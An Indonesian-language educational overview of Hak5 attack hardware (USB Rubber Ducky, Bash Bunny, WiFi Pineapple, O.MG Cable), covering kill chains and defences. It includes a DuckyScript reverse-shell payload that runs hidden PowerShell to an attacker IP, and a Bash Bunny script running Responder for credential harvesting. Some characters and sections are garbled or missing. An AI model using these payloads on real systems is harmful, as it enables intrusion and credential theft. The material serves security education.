Perangkat Hak5 adalah alat pengujian keamanan fisik dan jaringan yang diproduksi oleh Hak5 LLC (AS). Alat-alat ini dirancang untuk penetration testing, red teaming, dan edukasi keamanan. Seluruh informasi di bawah berasal dari dokumentasi resmi Hak5, repositori GitHub komunitas, serta penelitian keamanan publik. Pembahasan ini murni edukasional dan defensif. Penggunaan terhadap sistem tanpa izin adalah ilegal. Tujuan: membekali defender dengan pemahaman mendalam tentang ancaman fisik dan cara mitigasinya.
𧬠Gambaran Umum Ekosistem Hak5
Hak5 memproduksi perangkat keras ofensif portabel yang mengeksploitasi kelemahan pada lapisan fisik dan antarmuka manusia (USB, WiFi, Ethernet). Berbeda dengan malware atau exploit software, alat Hak5 bekerja dengan menyamar sebagai perangkat tepercaya (keyboard, network adapter, charging cable) untuk mengirimkan payload atau mencuri data.
Rogue Access Point, Evil Twin, deauth, captive portal, sniffing
O.MG Cable
Kabel USB (Lightning/USB-C)
Komputer, smartphone
Keyboard injection, data exfiltration, remote control via WiFi
Shark Jack
Kabel Ethernet portabel
Jaringan kabel
Network scanning, payload deployment via Ethernet
Packet Squirrel
Ethernet inline device
Jaringan kabel
Man-in-the-Middle, VPN pivot, packet capture
LAN Turtle
USB Ethernet adapter
Komputer, jaringan
Covert remote access, DNS spoofing
π¦ 1. USB Rubber Ducky β Keystroke Injection Device
Gambaran Umum
USB Rubber Ducky adalah keyboard injection tool yang menyamar sebagai USB HID (Human Interface Device) keyboard. Saat dicolokkan ke komputer, ia dikenali sebagai keyboard oleh OS dan mengetikkan payload dengan kecepatan superhuman (>900 karakter per detik). Karena OS mempercayai input keyboard sebagai tindakan pengguna, tidak ada antivirus atau EDR yang mendeteksi serangan ini.
Arsitektur Teknis
Komponen
Detail
Mikrokontroler
Atmel AT32UC3B (seri klasik) atau ARM Cortex-M3 (seri baru)
Penyimpanan
microSD card (payload + loot)
Firmware
DuckyScript interpreter
Antarmuka
USB-A (dikenali sebagai HID Keyboard)
Bahasa Payload
DuckyScript (sederhana, berbasis perintah)
DuckyScript β Bahasa Payload
REM Contoh payload: Reverse Shell via PowerShell
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
ENTER
DELAY 500
STRING $client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4444);...
ENTER
Fitur DuckyScript:
DELAY β menunggu dalam milidetik
STRING β mengetik teks
GUI r β menekan Windows+R
CTRL/ALT/SHIFT β modifier keys
Variable & logic (versi 3.0+)
Kill Chain Rubber Ducky
Delivery: Attacker mencolokkan Ducky ke port USB target (atau social engineering: βtolong colokkan flashdisk iniβ).
Enumeration: OS mengenali Ducky sebagai keyboard.
Payload Execution: Ducky mengetikkan payload dengan kecepatan tinggi.
Actions on Objective:
Reverse shell
Download & execute malware
Exfiltrasi file via DNS/HTTP
Buat admin account
Matikan antivirus/firewall
Varian & Evolusi
Varian
Keunggulan
Rubber Ducky Classic
Murah, payload DuckyScript sederhana
Rubber Ducky 3.0
ARM Cortex, DuckyScript 3.0, USB-C, stealth mode
DuckyScript 3.0
Variables, functions, logic, encryption
π° 2. Bash Bunny β Mini-Computer untuk Physical Attack
Gambaran Umum
Bash Bunny adalah komputer Linux portabel dalam form factor USB flash drive. Jika Rubber Ducky hanya bisa mengetik, Bash Bunny bisa:
Menyamar sebagai multiple devices secara simultan (keyboard + network adapter + serial + mass storage)
Menjalankan bash script penuh (tidak terbatas DuckyScript)
Melakukan Man-in-the-Middle via emulated Ethernet
Menyimpan loot di penyimpanan internal
Arsitektur Teknis
Komponen
Detail
CPU
ARM Cortex-A7 (Allwinner R16)
RAM
512 MB DDR3
Penyimpanan
microSD (payload) + internal flash
OS
Debian Linux (custom)
Antarmuka
USB-A (composite device: keyboard + RNDIS + serial + mass storage)
Switch Mode
Fisik: posisi 1, 2, 3 (masing-masing bisa dikonfigurasi untuk payload berbeda)
Mode Serangan (Switch Positions)
Posisi
Mode Default
Fungsi
1
RNDIS + HID + Storage
Network MITM + keyboard injection + file access
2
Serial-only
Debug & recovery
3
Customizable
Bisa dikonfigurasi sesuai kebutuhan
Arsitektur Multi-Stage Attack
[Colokkan Bash Bunny]
β
βΌ
[Boot Linux dalam 5-10 detik]
β
βΌ
[Jalankan payload.txt di root]
β
βββ ATTACKMODE RNDIS_ETHERNET HID STORAGE
β (muncul sebagai Ethernet adapter + Keyboard + Flashdisk)
β
βββ LED (status indicator)
β
βββ RUN Linux commands:
β - nmap scan jaringan
β - Responder (LLMNR/NBT-NS poisoning)
β - tcpdump (capture traffic)
β - Metasploit payload
β - Exfiltrasi file ke storage internal
β
βββ FINISH
(LED hijau = sukses, merah = gagal)
Contoh Payload Bash Bunny (bash script)
#!/bin/bash# Payload: Nmap scan + Responder untuk credential harvestingATTACKMODE RNDIS_ETHERNET HID STORAGELED R 100# Konfigurasi IPifconfig usb0 10.0.0.1 netmask 255.255.255.0 up# Jalankan Responder di backgroundresponder -I usb0 -w -f &# Jalankan nmap scannmap -sP 10.0.0.0/24 >> /root/udisk/loot/nmap_scan.txt# Kirimkan hasil via keyboard ke notepadLED G
WiFi Pineapple adalah platform serangan WiFi terintegrasi yang dikembangkan oleh Hak5. Perangkat ini adalah router Linux portabel dengan software suite untuk:
Mengirim deauthentication packets untuk memutuskan klien dari AP sah
Beacon Manager
Membuat puluhan SSID palsu (beacon flooding)
Recon
Passive scanning: mengumpulkan MAC, SSID, dan probe request
PineAP Suite
Kombinasi: Beacon Response, Probe Response, Association
Kill Chain WiFi Pineapple
Recon (Pasif): Pineapple mengumpulkan probe requests dari perangkat di sekitar. Setiap perangkat yang mencari WiFi memancarkan SSID yang pernah diingat (contoh: βStarbucks WiFiβ, βHomeNetworkβ).
Evil Twin: Pineapple membuat AP dengan SSID yang sama persis (dari probe request), tanpa password (atau dengan password yang sama jika diketahui).
Deauth: Klien yang terhubung ke AP sah diputuskan dengan deauth packets, memaksa mereka reconnect.
MITM: Setelah terhubung, semua traffic klien bisa dimonitor (jika tidak HTTPS/HSTS).
Penggunaan Defensif
WiFi Pineapple juga bisa digunakan untuk:
Audit keamanan WiFi organisasi
Deteksi Rogue AP di lingkungan korporat
Wireless Intrusion Detection (WIDS)
Pelatihan keamanan WiFi
π 4. O.MG Cable β Kabel USB Berbahaya dengan Remote Access
Gambaran Umum
O.MG Cable adalah kabel USB yang mengandung implan komputer di dalam konektor USB-nya. Dari luar, ia tampak dan berfungsi seperti kabel pengisian daya/data biasa. Namun, di dalam konektor terdapat:
Microcontroller (ESP32-S2 atau sejenis)
WiFi chip (untuk remote control)
Penyimpanan (untuk payload)
Keylogger (opsional)
Kemampuan
Fitur
Detail
Keyboard Injection
Mengetikkan payload via HID (seperti Rubber Ducky)
Remote Control via WiFi
Operator bisa mengontrol kabel dari jarak jauh (WiFi access point sendiri)
Self-Destruct
Bisa menghapus firmware sendiri untuk menghilangkan bukti
Data Exfiltration
Mencuri file dari target, dikirim via WiFi
Keylogging
Merekam semua ketukan keyboard target
Transparent Mode
Kabel tetap berfungsi sebagai kabel data/charging normal (target tidak curiga)
Software yang memblokir perangkat USB yang tidak dikenal.
Physically Secure Ports
Tutup port USB yang tidak digunakan dengan port lock atau epoxy.
Disable Unused USB in BIOS
Matikan port USB di BIOS untuk workstation sensitif.
2. Terhadap WiFi Pineapple
Metode
Detail
802.11w (Protected Management Frames)
Mencegah deauthentication attack.
Wireless Intrusion Detection (WIDS)
Deteksi rogue AP dan deauth flood.
Client Isolation
AP sah harus mengisolasi klien satu sama lain.
Edukasi Pengguna
Waspada terhadap captive portal yang meminta password WiFi.
VPN
Gunakan VPN untuk melindungi traffic meskipun terhubung ke Evil Twin.
3. Terhadap O.MG Cable
Metode
Detail
Gunakan Kabel Sendiri
Jangan pernah menerima kabel dari sumber tidak dikenal.
USB Data Blocker
Gunakan βUSB condomβ (data blocker) untuk hanya mengizinkan charging, bukan data.
Inspect Kabel
Periksa konektor USB untuk tonjolan atau berat yang tidak normal.
WiFi Scanning
O.MG Cable memancarkan SSID WiFi; bisa dideteksi dengan WiFi scanner.
βοΈ Dual-Use Spectrum
DEFENSE ββββββββββββββββββββββββββββββββββββββββββββΊ OFFENSE
Red Team Physical Pentest Insider Threat
β β β
Menguji keamanan Menunjukkan Menanamkan Bash
fisik dan respons celah fisik Bunny untuk akses
SOC terhadap kepada klien persisten ke
serangan fisik β jaringan internal
β β β
β βΌ βΌ
βΌ Social engineering Spionase industri,
Security awareness awareness pencurian data
training